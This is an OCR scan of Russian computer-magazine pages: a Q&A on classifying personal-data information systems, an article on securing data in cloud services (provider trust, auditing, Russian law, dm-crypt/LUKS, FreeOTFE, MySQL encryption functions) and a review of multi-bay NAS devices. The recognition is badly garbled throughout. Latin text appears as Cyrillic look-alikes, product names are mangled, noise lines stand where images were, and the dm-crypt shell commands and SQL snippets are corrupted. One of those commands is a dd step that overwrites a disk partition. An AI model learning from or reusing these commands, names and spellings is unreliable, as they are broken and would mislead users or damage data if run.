ЯВЛЯЮТСЯ ОБЪЕМ И КАТЕГОРИЯ ПДН, ТО 
ЗАЧЕМ НУЖНА ИНФОРМАЦИЯ О 
КОЛИЧЕСТВЕ ПОЛЬЗОВАТЕЛЕЙ И 
РАЗГРАНИЧЕНИИ ДОСТУПА? 

В прошлой статье я уже говорил, что 
персональные данные относятся к 
защищаемой законом информации и автомати- 
зированные системы следует классифицировать 
еще и согласно РД «Автоматизированные 
системы. Защита автоматизированных систем от 
несанкционированного доступа». Порядок 



классификации в нашем случае такой: 

• один пользователь — 
класс защищенность ЗБ; 

• много пользователей с одинаковыми 
правами — 2Б; 

• много пользователей с разными 
правами — 1 Д. 

Кстати, администратор тоже является поль- 
зователем (он же имеет доступ к компьютеру), 
так что класс 2Б становится каким-то очень 
невостребованным. Даже если пользователи 
сидят под админскими учетками, права на 
администрирование средств защиты есть только 
у админа. 

Вот такая вот двойная классификация. Если 
посмотреть, то требования к защите инфор- 
мации в ИСПДн чаще всего включают в себя 
требования из РД и некоторые дополнительные 
требования. Сам РД есть в интернете, на том же 
сайте ФСТЭКа. 

КАКАЯ ИНФОРМАЦИОННАЯ СИСТЕМА 
ЯВЛЯЕТСЯ РАСПРЕДЕЛЕННОЙ, А 
КАКАЯ— ЛОКАЛЬНОЙ? 

Проще всего разделить по такому 
принципу: если линии связи проходят вне 
контролируемой зоны, то ИС считается 
распределенной, а в противном случае — ло- 
кальной. Под контролируемой зоной понимают 
такую зону, доступ в которую контролируется 
организацией. 
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Сергей «дгіпсіег» Яремчук (дгіпсіегШих.іп.иа) 



Когда 

сгущаются 

тучи 
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• СайтШКБ — сосіе. 
доодіе.сот/р/ 
сгуріБеіир 

• МуБСІІ. 5.6 
Ке^егепсе МапиаІ 

— Епсгѵрііопапсі 
Сотрге55Іоп-сІск. 
ги/Р85І 

• ѴѴіпсіоѵѵб АіигеБйК 

— тісгозоН.сот/ 
ѵѵіпгіоѵѵБагиге/Бгік 



• Сайтѵбаіе Р2 — 
Бесигііусосіе.ги/ 
ргогіисіБ/Бп ѵт- 
ѵѵаге/ѵдаіе сот 

• Страница МоѵеІІ 
СІоисІБесигіІуБег- 
ѵісе — поѵеІІ.сот/ 

ргосІисіБ/сІоисІ- 

Бесигііу-Бегѵісе 

• СайтРгееОТРЕ — 

ГгееоНе.огд 



ЗАЩИЩАЕМ ДАННЫЕ В «ОБЛАКЕ» 



ІШ1 




Для передачи 
ключа и взаимной 
аутентификации 
пользователя 
и серверов 
«облака» наиболее 
оптимальна схема 
шифрования с 
открытым ключом. 



Интерес к «облачным» технологиям растет с 
каждым днем. С одной стороны, его подогревает 
хороший РР, а с другой — очевидная выгода, 
ведь компании предпочитают платить за 
функциональность, а не за поддержание 
собственной инфраструктуры. Аналитики 
прогнозируют, что в течение нескольких 
следующих лет частота использования 
«облаков» возрастет как минимум в пять 
раз. И все же большинство пользователей с 
недоверием относится к новой фишке. Главная 
причина этого недоверия кроется в проблеме с 
защитой своих данных в чужих «облаках». 



О БЕЗОПАСНОСТИ В ОБЛАКЕ 



Использовать «облака» крайне выгодно. В первую очередь, они 
исключают необходимость в приобретении железа (РааБ) и софта 
(БааБ) и в их последующей модернизации, а также сокращают 
временные затраты на внедрение. При внедрении сервиса тяжело 
подобрать нужное железо сразу, поэтому оборудование всегда 
берут с запасом мощности. Однако впоследствии нередко выясня- 
ется, что мощность используется всего на треть (то есть средства 
потрачены зря). Еще хуже, когда ее не хватает. В этом плане «обла- 
ка» гораздо эффективнее, ведь в них очень просто увеличить или 
уменьшить ресурсы, да и, как правило, нет банальных простоев 
из-за поломок оборудования. 

То есть ты просто заплатил, арендовал и работаешь, а если 
ресурсов сервера станет недостаточно, их легко можно увеличить. 
Большую роль здесь играетуспех виртуализации, которая, по дан- 
ным ѵ-іпсіех.сот, достигла уже 38,9 %. Единственное, что остается 
невыясненным, — это вопрос безопасности. Самое интересное, что 
проблема кроется в самом принципе организации данных. Ранее 
пользователь самостоятельно подбирал и настраивал приложение, 
решал все сопутствующие вопросы, в том числе организовывал 
защиту и проводил мероприятия по резервному копированию, чтобы 
обеспечить сохранность и доступность данных. Теперь все эти 
задачи возлагаются на провайдера услуг, который предоставляет 
решения БааБ (БоіТѵѵаге аз а Бегѵісе — приложение как услуга) или 
РааБ (РІаиогт аз а Бегѵісе — платформа какуслуга), и кактам у 
него все организовано, часто можно только догадываться. Поэтому 
организациям приходится полностью доверять поставщику, который 
не всегда можетуберечь их от неприятностей. В лицензиях так и на- 
писано: защита — забота клиента. Именно риск потерять разом все 
данные, помноженный на возможность утечки конфиденциальной 
информации, останавливает многих пользователей от внедрения 
БааБ. Кстати, специалисты по обеспечению безопасности опериру- 
ют при разработке систем защиты именно понятием рисков. То есть 
если данные никому не нужны, то и смысла строить баррикады нет, 
достаточно простого замка. Конечно, если сервис предоставляют 
такие монстры, как боодіе или Атагоп, обладающие большими 
ресурсами и находящиеся «за бугром», то вряд ли стоит опасаться 
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По данным сайта ѵ-іпсіех.сот, процент виртуализации не так уже и мал 



того, что в дата-центр ворвутся люди в масках и конфискуют все 
сервера или жесткий диск сопрет неблагонадежный сотрудник. Как 
раз наоборот — человеки из «маски-шоу» должны знать, что данные 
находятся в «облаках». ;) То есть в этом случае мы сможем сохранить 
данные и хотя бы частично возобновить работу, подключившись из 
другого офиса. В любом случае риски одинаковы, да и в некоторые 
местные ЦОД попасть не так-то просто. Именитые игроки на рынке 
защищены на порядок лучше, чем серверная в небольшой организа- 
ции. Такие компании заботятся о своем имидже и поэтому проводят 
весь комплекс необходимых мероприятий и создают специальные 
отделы по обеспечению внутренней безопасности. К тому же если 
компания — поставщикуслуг давно работает на рынке, имеет 
подготовленный персонал (а как иначе удержаться) и заботится 
о своей репутации, то она должна вызывать больше доверия, чем 
вчерашний студент, нанятый на испытательный срок. Добавим, что 
половина утечек из компаний происходит по вине инсайдеров. 

За сетевую безопасность внутреннего сервиса полностью отве- 
чает админ, который размещает его в йМ2 и контролирует весь тра- 
фик, ограничивая доступ только из доверенных сетей при помощи 
файервола и с использованием других методов (ѴРІМ, /еІс/МозІ.аІІоѵѵ). 
В случае ОйоЗ-атаки на провайдера или одного из клиентов могут 
пострадать сразу несколько организаций. Не меньшие проблемы 
возникнут и при взломе сервиса. Теперьже обеспечение безопас- 
ности частично возлагается на разработчиков сервиса, а штатному 
админу доступно меньше методов контроля, которые в случае 5аа5 
работают на уровне приложений и вряд ли отличаются большой 
гибкостью. И хорошо, если они вообще есть. Кроме того, управлять 
правилами местного файервола при этом на порядок тяжелее. Для 
подготовленного админа, в распоряжении которого небольшая 
сеть, это не проблема. В случае разветвленной сети можно обратить 
внимание на продукт Бесигііу Собе ТгизіАссезз ( зесигііѵсосіе.ги/ 
ргобисізЛгизіассезз ) который позволяет организовать централизо- 
ванное управление распределенным межсетевым экраном. 

Не менее важный вопрос — возможность миграции на другую 
платформу или сервис. Что делать при смене провайдера? Ведь 
один поставщик не может устраивать абсолютно всех. Недовольство 
может быть вызвано не только внеплановым повышением цен, на 
которое не рассчитан бюджет, но и, например, отсутствием каких- 
либо важных функций или невозможностью интеграции в текущую 
инфраструктуру. В случае 5аа5 с миграцией, наверное, возникает 
больше затруднений, так как приложения часто имеют специфи- 
ческую структуру данных, а вот скачать и перенести ОС с помощью 
чего-то вроде ѴМѵѵаге ѵСІоиб йігесіог проблем нет. 



АУДИТ В «ОБЛАКЕ» 



Еще один важный момент — контроль и аудит всех действий, 
выполняемых администратором и пользователями. При наличии 
большого числа сервисов легко напутать с правами. В принципе, 



администратор, «имеющий все», может навредить в любом случае 
(«облако» или локальная система): всего пара команд — и данных 
нет, аналогично могут уйти в небытие и резервные копии. Таких 
примеров можно привести тысячи, в век виртуализации они уже 
никого не удивляют. Например, как сообщает СотріЛегѴѴогІсІ, 
администратор одной из компаний, обидевшись на работодателя, 
одним махом удалил почти сотню серверов, работавших на ѴМѵѵаге 
ѵБрЬеге. В случае 5аа5 ситуация уже не так однозначна. Админи- 
стратор провайдера может одной командой уничтожить несколько 
десятков виртуальных машин со всеми данными, а админ организа- 
ции — только свой сервис. В обоих случаях вину могут свалить и на 
провайдера, если только он не докажет, что данные 5аа5 компании 
уничтожены самими админом. Чтобы подобных проблем не возни- 
кало, провайдеру и компании-клиенту лучше иметь по собственной 
резервной копии. В этом случае уничтожить сервис будет не так-то 
просто. Таким образом, разграничение доступа и аудит всех событий 
очень важны, ведь кроме прямого вредительства может иметь место 
и кража данных (экспорт на любой внешний источник). В идеале 
администратор управляет сервером, данные находятся в руках 
менеджера, а за действиями администратора и менеджера следит 
кто-то из секьюрити. Единственным на сегодня сертифицирован- 
ным решением, которое обеспечивает безопасность виртуальных 
инфраструктур, построенных на продуктах ѴМѵѵаге, является ѵбаіе 
Р2 ( зесигііусобе.ги/ргобисіз/зп ѵтѵѵагеА/даІе сот ). В нем доступны 
автоматические настройки безопасности, реализованы мандатная 
модель управления доступом (каждый можетуправлять только 
своими ѴМ), строгая аутентификация админов, защита средств 
управления, разграничение доступа (на основе АСІ_ и портов), кон- 
троль целостности ѴМ, расширенный аудит событий и мониторинг. 
Возможности и функции администратора виртуальной инфраструк- 
туры (АВИ) и администратора информационной безопасности (АИБ) 
четко разграничены. Процедура аутентификации для них усилена, 
АВИ к тому же дополнительно использует программу-агент. 



РИЧАРД СТОЛЛМАН ПРОТИВ 
«ОБЛАКОВ» 



Ричард Столлман ( зпи.огд/рЫІозорІіуА/ѵІіо-сІоез-іІіаІ-зегѵег-геаІІу- 

зегѵе.ШтІ ) считает «облачную» технологию шпионской и сравнивает 
ее с большим бэкдором, так как она дает власть над пользователем. 

В своем обращении он призывает избегать 5аа5-услуг и стараться 
самостоятельно контролировать обработку данных. 




Консоль управления ѵбаіе 
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5УЫХАСК 



Еще один продукт— ІМоѵеІІ СІоисІ 5есигіІу Зегѵісе (N055, 
сот/ргосіисіз/сіоисі-зесигііѵ-зегѵісе ) — дает возможность легко 
управлять учетными данными предприятия, реплицируя все из- 
менения в аккаунтах в «облако» и тем самым создавая единую базу. 
Работает N055 очень просто: служба размещается в локальной сети 
или «облаке» и интегрируется в службу аутентификации предприя- 
тия (вроде Асііѵе йігесіогу). Пользователь, который хочет получить 
данные с 5аа5/Раа5/1аа5, регистрируется обычным образом, а N055 
генерируеттикет, соответствующий требованиям поставщика услуг. 

Несмотря на то, что при выборе поставщика 5аа5 пользователей 
больше всего волнует именно безопасность, многие специалисты 
считают степень доступности и производительность не менее 
важными факторами. Следует отметить, что они имеют большое 
значение для обеих сторон, ведь использование 5аа5 автоматиче- 
ски означаетувеличение нагрузки на внешний канал и появление 
зависимости от его стабильности. Поэтому с клиентской стороны 
необходимо предусмотреть все необходимые меры, хотя сегодня 
каналы падают редко и в таких случаях ничто не мешает подклю- 
читься к другому провайдеру. К тому же отсутствие интернета часто 
означает, что нормальная работа в любом случае невозможна, а 
потому совершенно неважно, есть ли при этом доступ к «облаку». 
Однако при его наличии работающие вне офиса сотрудники смогут 
получать данные без задержек. 



ШИФРОВАНИЕ ДАННЫХ 



Большинство вменяемых администраторов считает, что данные, 
размещаемые в облаке, и канал связи лучше шифровать. С обменом 
данными в 5аа5 проблем обычно не бывает. Провайдеры предо- 
ставляют доступ по защищенному протоколу НТТР5, а администра- 
тору клиента остается лишь следить за сертификатами. А вот как 
контролировать данные в «облаке», если они находятся в открытом 



ИСПОЛЬЗОВАНИЕ РМ-СКУРТ 



«ОБЛАКО» И ЗАКОН 



Использование криптографии регламентировано рядом постанов- 
лений и указов и требует наличия специального сертификата. Здесь 
очень много всяких тонкостей, разобраться в которых не так-то 
просто, но если провайдер услуг находится не на территории России 
(как Атаіоп ЕС2), а обработка персональных данных не произво- 
дится, то формально никаких проблем нет. Федеральный закон №152 
«О персональных данных» [ сіск. ги/Р0с1с ] не препятствует обработке 
персональных данных в публичном «облаке» и разрешает делеги- 
ровать ихтретьим лицам. Таким образом, в этом плане все вроде 
как чисто. Согласно другой точке зрения, размещение информации 
в публичном «облаке» автоматически требует отдельного согласия 
субъекта. Многое зависит от категории информационной системы, 
обрабатывающей данные, например, банк не сможет их выполнить 
в любом случае, как бы он этого ни хотел. Главная заковырка ФЗ-152 
заключается втом, что обмен информацией, связанной с персональ- 
ными данными, должен производиться по каналам связи, защищен- 
ным с помощью сертифицированных криптосредств. А это требует 
отдельного согласования и наличия соответствующих средств у 
обеих сторон. Особенно много вопросов возникает, если провайдер 
находится за границей. Многие ответы можно будет найти в подза- 
конном акте «О статусе облачных платформ». Ожидается, что в нем 
будутжестко прописаны требования к хостерам (только Россия], 
которых обяжут предоставлять доказательства своей защищен- 
ности. К слову, «за бугром» законы только начинают адаптировать 
к новым условиям, поэтому каких-либо существенных ограничений 
по обработке персональных данных нет. Зато стандарт РСІ (Раутепі 
СагсІ Іп^газігисішге], регулирующий вопросы безопасности при работе 
с кредитными картами, отвечает однозначно: «облаку» — нет. Пока 
такой сертификату нас не требуется, но тем, кто выходит на междуна- 
родный рынок, лучше предусмотреть эту ситуацию, ведь с организа- 
цией, не имеющей РСІ, многие просто не захотят иметь дело. 



Система бт-сгурі: опирается на подсистему шифрования устройств, 
которая поддерживается ядром 2.6+ и использует СгурІоАРІ. Она может 
шифровать файлы, блочные устройства, раздел подкачки и хранения 
памяти НуЬегпа1:е. К шифрованному разделу также можно получить 
доступ из-под ѴѴіпсіоѵѵб с помощью РгееОТРЕ, если файловая система 
зашифрованного раздела поддерживается в ѴѴіпсіоѵѵб. 

$ біісіо арі-^еі: іпБіаІІ сгѵрІіБеІіир 

Далее следует подготовить раздел или файл: 

$ 5іісІо сісі і-р=/сІеѵ/ 2 его оТ=/сІеѵ/5СІа5 Ьб=4К 

Форматируем и подключаем через /беѵ/таррег/: 

$ зисіо сгѵрІіБеІіир -у ІикБРогтаі: /сІеѵ/зсІаБ 
$ Бибо сгѵрІіБеІіир ІикзОреп /сІеѵ/зсІаБ епссІІБк 

Теперь его можно использовать как обычный раздел на жестком 
диске, отформатировать и примонтировать. 

$ біісіо тк-рБ .Ш5СІ05 /сІеѵ/таррег/епссІІ5к 

$ біісіо тоипіі -1: ѵ-Раі: -о гы /сІеѵ/таррег/епссІІ5к /тгтЕ/ 

епссІІБк 

После завершения работы с разделом его можно освободить: 

$ біісіо итоипіі /тпі/епсДІБк 

$ Бисіо сгѵрІіБеІіир ІикБСІОБе /сІеѵ/таррег/епссІІБк 



виде, — вопрос очень волнующий. Кто знает, не затесался ли в 
компанию-поставщик злой инсайдер? Разумеется, для передачи 
ключа и взаимной аутентификации пользователя и серверов «об- 
лака» наиболее оптимальна схема шифрования с открытым ключом. 

Технологии могут быть использованы разные. Очень популярна 
ЮК5 (ТЬе Ыпих ІІпіЯесІ Кеу 5е1ир, сосІе.доод1е.сот/р/сгѵрІ5е1ир ). 
которая для Ыпих реализована в бт-сгурі, позволяющем созда- 
вать зашифрованные разделы или логические диски. ШК5 также 
поддерживает схему безопасной установки ключей ТК51 (Тетріаіе 
Кеу 5е1ир 1), которая позволяет менять пользовательский ключ, не 
перешифровывая весь диск, работать с несколькими ключами и 
разделять секретные данные путем ввода двух ключей. В ѴѴіпсіоѵѵб 
технология реализована в пакете РгееОТРЕ ( ігееоіТе.огд ), который 
совместим с зашифрованными томами Ыпих (сгуріоіоор, бт-сгурі) и 
поддерживает двухфакторную аутентификацию с использованием 
смарт-карты или Н5М (Нагбѵѵаге 5есигііу МосМе, модуль безопасно- 
сти аппаратных средств) благодаря стандарту РКС5#11. 

Кроме этого, в последних версиях ѴѴіпсіоѵѵб доступна функ- 
ция шифрования разделов ВШ_оскег (а в старых версиях — ЕР5, 
Епсгуріеб Рііе Бузіет). Однако шифровать весь раздел или 
создавать закрытые контейнеры необязательно. С учетом того, 
что в большинстве случаев информация хранится в СУБД, можно 
зашифровать только соответствующие таблицы. Таким образом, 
инсайдер, получивший к ним доступ, ничего не сможет сделать без 
ключа. Каких-либо дополнительных усилий для этого не требуется, 
ведь большинство современных СУБД имеет достаточно надежные 
механизмы, поэтому остается лишь их задействовать. Например, в 
Му5СИ_ Реіюгепсе МапиаІ имеется п. 11.13 под названием Епсгурііоп 
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Когда сгущаются тучи 



ІМ*. 1 1 Ьймм Ѵшш* 1^лшг«мЪгшл1 ■■ ■ ■■-.» ■■ ■ 




МуБОЬ предлагает 15 функций для шифрования содержимого таблиц 



апсі Сотргеззіоп Рипсііопз, в котором описано 15 функций. Часто 
достаточно лишь немного модернизировать 5(ЭІ_-вызовы в приложе- 
нии, чтобы все происходило автоматически. 

> СКЕАТЕ ТАВІ.Е тсІБ 1:Ы (тсІБ ѵаі СНАК(32). ...V. 

> ТЫБЕКТ ІІМТО тсІ5 _1=Ы (тсІ5 ѵаі. . . . ^ ѴАШЕ5(МР5( г аЬссІе-РМ . 

Многие «облачные» сервисы предлагают механизмы шиф- 
рования и АРІ для удобного доступа к ним. В ѴѴіпсІоѵѵз Агиге 5йК 
( тісгозой.сот/ѵѵіпсіоѵѵзагиге/зсік ), который позволяет разработчи- 
кам использовать сервисы ѴѴіпсІоѵѵз Агиге, имеется и набор функ- 
ций, обеспечивающих доступ к С5Р (СгурІодгарЫс Зегѵісе Ргоѵібег, 
провайдер криптографических сервисов). 

Логично предположить, что шифрование не решает всех про- 
блем, поскольку кутечке информации могут привести уязвимости 
типа Х55 и 5(ЗІ_ іп)есЛоп или, например, слишком простые паро- 
ли, а также традиционные атаки или использование социальной 
инженерии и так далее. На сегодняшний день большинство широко 
используемых технологий, служащих для управления ключами 
шифрования, имеет недостатки. Особенно остро стоит вопрос об 
управлении ключевой информацией, где хранить ключи, как ис- 
пользовать (вводить вручную неудобно, да и не совсем безопасно) 




ІРтИі4І*ѵ НМ цгікІл-^гЧі тФІчЯМ ■■■ 4* і*І 1 ІЩ **1**ІІ*Ч 

ІГНПІІ 

■ гпЧвтін -*ЕЬт- ■нЧІп- чнЛІлѵ іпм 

МКЧ ”І1иіИчі Іі ~**4 к» 1 1 р м'* МЦ 

Ізриыв м-ігцгі ЯШ 

№ІР^Г>| І ■ Т 411 Інг ■■Г'ГІ ІШІі 

цірщ 

Ікпт 14гМ #п| ПІІІ ірт ’іНінт Ц ІШІг ^іск|п рі»: 

ЕГІЕІГ * іи ЧПІІІ 1 

Н«*к№» I «ЧИЧ ИЧЙ ■*+*+■ «4СЧ* Рг М*ІНІ -ИЧІГг- 

■пкИ-ІНЧ' Іі* кт І ЬіЙ, іЫЧ*. «і-Ч'т пгк*>яМ. Чт Щ*. «и «II* . +Г 
ыі, -.Щ|ц ЧНІ. 







д»- і - а - — * ч- 

В Ыпих зашифрованный раздел создается с помощью сіт-сгурі 

и какзащищать. При наличии большого числа виртуальных машин 
система шифрования тоже может стать источником проблем, ведь 
нужно понять, кому и куда разрешен доступ, и соответственно рас- 
пределить ключи. Технология должна быть гибкой и не привязанной 
к конкретному провайдеру услуг. Самым популярным решением, 
обеспечивающим шифрование данных и управление ключами, 
является ТгепсІ Місго ЗесигеСІоіісІ, который представляет собой 
удобную надстройку над РгееОТРЕ и другими утилитами. Эта над- 
стройка использует специальную технологию, которая позволяет 
проверять сервера, запрашивающие ключи, контролировать доступ 
к закрытым данным и удалять информацию без возможности вос- 
становления. В случае смены поставщика услуг все данные без про- 
блем переносятся. Утилита поддерживает Атагоп ЕС2, Еисаіуріиз и 
ѵСІоші БесигеСІоисІ распространяется как «из коробки», так и в виде 
сервиса. В качестве минуса можно отметить тот факт, что шифрова- 
ние/дешифрование существенно тормозит виртуальную машину. 



ЗАКЛЮЧЕНИЕ 



«Облака» — это очень удобно, круто, весело и современно. Если вду- 
маться, то и проблем с безопасностью у них в большинстве случаев 
меньше, чем на серверах, находящихся в ведении у криворукого 
админа. Поэтому не думай, что мы против. Мы — за! Просто предо- 
храняйся. ПЕ 




РгееОТРЕ с зашифрованными томами Ыпих 



ТгепсІ Місго БесигеСІоисІ позволяетуправлять шифрованием в нескольких 
«облачных» сервисах 
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ГЕМШМ 



Сергей Плотников 




В этой статье мы не будем рассматривать маленькие 
жужжащие коробочки. Перед нами настоящие 
домашниемонстры,оснащенныенеслабым«железом» 
(по меркам N АБ) и имеющие пять или шесть отсеков 
под жесткие диски. Представь, сколько всякой 
всячины можно разместить в таком хранилище! 

ИСТОКИ 

Системы хранения данных претерпели множество изменений. В персональ- 
ных компьютерах до сих пор используется один или несколько накопителей. 
Но такой подход не всегда надежен и эффективен, особенно если у нас 
есть несколько ПК, объединенных в сеть. Вообще, все «одомашненные» 
устройства появились в результате разработки высокотехнологичных 
сетевых и серверных решений. Самый простой пример — РАЮ. Раньше мас- 
сивы использовались исключительно на серверах, теперь даже в среднем 
ценовом диапазоне сложно найти материнскую плату без поддержки РАЮ. 
Он хорош, когда требуется высокая производительность системы и скорость 
при работе с большими объемами данных, например при видеомонтаже. А 
что делать, когда многим рабочим станциям требуется доступ к одним и тем 
же данным? Ответ возникает сам собой — использовать ЫА5. Естественно, 
со 100 ПК обычное сетевое хранилище не справится, но для небольшого 
офиса и тем более для дома оно подойдет идеально. Ведь ЫА5 незаменим не 
только для работы, но и для развлечений. 

МЕТОДИКА ТЕСТИРОВАНИЯ 

Мы будем использовать уже проверенный способ тестирования. Возьмем 
бенчмарк Іпіеі ЫА5 РеНюгтапсе Тооікіі — универсальный тестовый пакет для 
любого сетевого хранилища. Он способен нагрузить ЫА5 различными зада- 
чами, от банального копирования файлов и папок до потокового воспроизве- 
дения и записи видео. Для того чтобы проверить максимальную производи- 
тельность, мы установили режим РАЮО. А вот в режиме РАЮ5 мы смотрели, 
насколько быстро система справляется с вычислениями. Помимо скоростных 
показателей устройства, также оценивалась прошивка. Набор утилит и сер- 
висов, время отклика интерфейса и интуитивность — все это очень важно при 
выборе ЫА5. На все сетевые хранилища были установлены последние версии 
прошивок с сайтов производителей. 



позови 

ИА5 

К СЕБЕ 



ТЕСТИРОВАНИЕ 
5- И 6-ДИСКОВЫХ 
ЫА5-СЕРВЕРОВ 
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се продукты от ЫЕТ6ЕАР отличаются простым 
и красивым дизайном. Такую вещь хочется выста- 
вить всем напоказ. Качество сборки и материа- 
лов не вызывает никаких нареканий. ЫЕТ6ЕАР РеабуЫАЗ 
6 ІШга имеет шесть слотов для жестких дисков объемом 
до 2 Тбайт. Таким образом, можно получить хранилище 
общим объемом в 12 Тбайт, что очень недурно. 

Но это не главное. Очень порадовала скорость фор- 
матирования и синхронизации в РАЮ5. За управление 
«железом» отвечает бессмертный РгопіѴіеѵѵ. Хорошо, 
что одна и та же прошивка подходит для всех устройств. 
Поэтому при переходе на более производительную модель 
не должно возникнуть трудностей с настройкой системы. 
Скоростные показатели не самые высокие, однако при- 
ближаются к показателям топовых решений. Функционал 
ЫЕТСЕАР РеасІуМАЗ 6 Шга, который можно существенно 
увеличить за счет модулей расширения, позволяет ис- 
пользовать хранилище как в офисе, так и дома. 



О-ИЫК 5Н АРЕСЕЫТЕР 
РК0 1200 



ЫЕТ6ЕАК КЕА0УЫА5 
6Ш.ТКА 



овинка от й-Ыпк оснащена пятью слотами для 
жестких дисков, парой разъемов ЕіЬегпеІ и 
парой 115В. Скудновато по нынешним меркам. 
Производитель не поленился разместить маленький 
01_Е0-дисплей на передней панели. Правда, настроить 
с его помощью ничего не удастся, можно лишь информа- 
цию о сети посмотреть да состояние массива проверить. 
Вообще, внешний вид устройства радует, а два венти- 
лятора сзади работают довольно тихо. Правда, изредка 
обороты повышаются, но это нормально, ведь охлаждать 
ряд близкорасположенных жестких дисков — непростая 
задача. 

й-Ыпк ЗЬагеСепІег Рго 1200 выдает среднюю ско- 
рость. Этот факт немного портит общую картину, но на 
небольшой офис производительности должно хватить. 

Наконец-то мы видим у хранилища й-Ыпк достойный 
и приятный интерфейс. Да и функционал вырос, напри- 
мер появилась поддержка І5С5І. Кстати, набор служб и 
сервисов говорит о бизнес-направленности устройства. 
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ЫЕТ6ЕАК РЕА0УЫА5 6 ІЛ-ТКА РІ 



N 



ЕТЗЕАР РеасІуМАБ 6 ІШга РІиз является прямым наследни- 
ком ЫЕТЗЕАР РеасІуЫ АБ 6 ІІІІга. Внешний вид полностью 
идентичен виду младшей модели. Внутри у нового устрой- 
ства не какой-нибудь там Іпіеі Аіот, а целый I піеі Репііит Е2160, 
работающий на частоте 1,8 ГГц. Этот процессор дает хороший 
прирост производительности. В отличие от младшей модели, здесь 
вентилятор располагается на боковой панели корпуса. Кстати, это 
никак не сказывается на общем уровне шума. 

Теперь несколько негативных моментов. Последняя прошивка 
устройства РгопіѴіеѵѵ 4.2.16 работает несколько некорректно. 
Во-первых, в процессе тестирования система никак не хотела 
сбрасываться к заводским настройкам из Вооі Мепи. Во-вторых, 
форматирование в режиме РАЮ5 иногда зависало. Что интересно, 
таких проблем не наблюдалось в ЫЕТ6ЕАР ПеасІуМАБ 6 ІЭ Ига. Мож- 
но предположить, что ПО просто не очень хорошо оптимизировано 
под новое «железо». Стоит отметить, что такая проблема характер- 
на для многих свежих девайсов, поэтому не будем судить строго и 
дадим производителю время на доработку прошивки. 




◄ 




ОЫАР Т5-559 РКО+ 



стречаем ОЫАР Т5-559 Рго+, который стал лидером нашего 
обзора. Мы не раз положительно отзывались о продукции 
ОЫАР на страницах нашего журнала. В этом нет ничего 
удивительного, так как сетевые хранилища ОЫАР отличаются 
высоким качеством, оснащаются сбалансированным «железом» 
и замечательной прошивкой. ОЫАР Т5-559 Рго+ имеет множество 
интерфейсов для подключения дополнительных дисков, принте- 
ров, хабов и ИБП. Еще одним преимуществом хранилища является 
ѴСА-разъем на задней панели. О чем это говорит? Правильно, о 
том, что мы можем пользоваться сторонней операционной систе- 
мой. В основном ѴЗА нужен для устранения неисправностей. ОЫАР 
Т5-559 Рго+ имеет довольно функциональное ПО. Тест показал от- 
личную производительность хранилища, во всех категориях были 
получены высокие показатели. В режиме РАЮ5 скорость «просе- 
дала» совсем немного, что говорит о хорошей работе инженеров и 
правильном использовании ресурсов. 



ТЕХНИЧЕСКИЕ 

ХАРАКТЕРИСТИКИ 



Процессор 
Оперативная память 
Порты 

Уровни 

Протоколы 




2х ЕіЬегпеІ (10/100/1000 Мбит/с), 2х 
115В 2.0 

ЦВОй, РАЮ 0, РАЮ 1,РАЮ 5, РАЮ 6, 
РАЮ 10 

СІР5/5МВ, РТР, ІІРпР, НТТР, ИР5, 15С5І 



ІпТеІ Аіот йиаі Соге, 1,66 ГГц 

0йР2 йІММ 1x1 Гбайт 

2х ЕіЬегпеІ (10/100/1000 Мбит/с), Зх 115В 2.0 

Х-РАЮ2, РАЮ 0, РАЮ 1, РАЮ 5, РАЮ 6 

СІР5/5МВ, РТР, ІІРпР, НИР, АРР, ИР5, 0І_І\ІА, 
Вопіоиг 



Іпіеі РепГигп Е2160, 1,8 ГГц 

0йР2 йІММ 1x1 Гбайт 

2х ЕіНегпеІ (10/100/1000 Мбит/с), Зх 115В 2.0 

Х-РАЮ2, РАЮ 0, РАЮ 1, РАЮ 5, РАЮ 6 

СІР5/5МВ, РТР, ІІРпР, НИР, АРР, ИР5, 01_МА, 
Вопіоиг 
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5УЫ0ЮСУ 0І5К5ТАТІ0Ы 051511+ 



упоіоду 0ізк5іаЛоп 051511+ является прямым конкурен- 
том ОЫАР Т5-559 Рго+. Производительность продукта от 
Зупоіоду при выполнении некоторых задач выше, однако 
он имеет определенные конструктивные недостатки. Во-первых, 
на его передней панели нет дисплея. Он редко используется, но 
иногда все же бывает очень полезен. Во-вторых, салазки сде- 
ланы из пластика, поэтому при демонтаже жесткого диска есть 
опасность сломать крепежную пластину. На это стоит обратить 
внимание, так как устройство ориентировано на работу в бизнес- 
сегменте, где периодически требуется замена дисков. 

Теперь о хорошем. При почти такой же производительности, как 
у ОЫАР Т5-559 Рго+, цена Зупоіоду 0ізк5іаЛоп 051511+ несколько 
ниже, а его прошивка, выполненная в стиле одной известной кали- 
форнийской компании, работает без нареканий. Отклик быстрый, а 
все компоненты находятся на своем месте. Еще одно достоинство 
устройства в том, что дисковый массив можно расширить с помо- 
щью дополнительных модулей. Суммарный объем после увеличе- 
ния может достигать 45 Тбайт. 





ТНЕСІІ5 Ы5200ХХХ 



авершает наш обзор ТЬесиз ІМ5200ХХХ. Главным достоин- 
ством этой модели является приемлемая цена при высокой 
производительности. Прошивка похожа на прошивки дру- 
гих подобных устройств, за исключением разве что ЫЕТСЕАР: сле- 
ва находятся пункты меню, а справа, собственно, сама настройка. 

В плане «железа» тоже все хорошо: двухъядерный Іпіеі Аіот 0525 
в совокупности с 1 Гбайт памяти ООРЗ дает хорошую производи- 
тельность. Немного хлипкой нам показалась дверца, закрывающая 
отсеки с жесткими дисками. По конструкции больше нареканий 
нет. Охлаждение хранилища работает тихо даже при такой нагруз- 
ке, как форматирование массива НОй. Помимо информативного 
01_Е0-дисплея, присутствует светодиодная индикация активности/ 
неисправности жестких дисков и состояния І_АІ\І- и ІІ5В-портов. 

В целом работа с Тбесиз ІМ5200ХХХ оставила хорошее впечатле- 
ние, поэтому модель наверняка найдет своего покупателя. Произ- 
водитель заявляет, что это «долгосрочное решение, разработанное 
с учетом дальнейшего роста потребностей», и, скорее всего, не 
ошибается. 




Іпіеі Аіот 0525, 1,8 ГГц 
Ц0Р2ІХІ Гбайт 

2х ЕіНегпеІ (10/100/1000 Мбит/с), 5х 
115В 2.0, 2х еЗАТА, Ѵ6А 
ЦВОй, РАЮ О, РАЮ 1, РАЮ 5, РАЮ 5+, 
РАЮ 6, РАЮ 6+, РАЮ 10, РАЮ 10+ 
СІР5/5МВ, РТРДРТР, ІІРпР, НИР, 
НТТР5, АРР, ЫР5, 01_МА, Вопіоиг, 
І5С5І, Іеіпеі, 55Н,5ММР 



йиаі Соге, 1,8 ГГц 
00Р2, 1х 1 Гбайт 

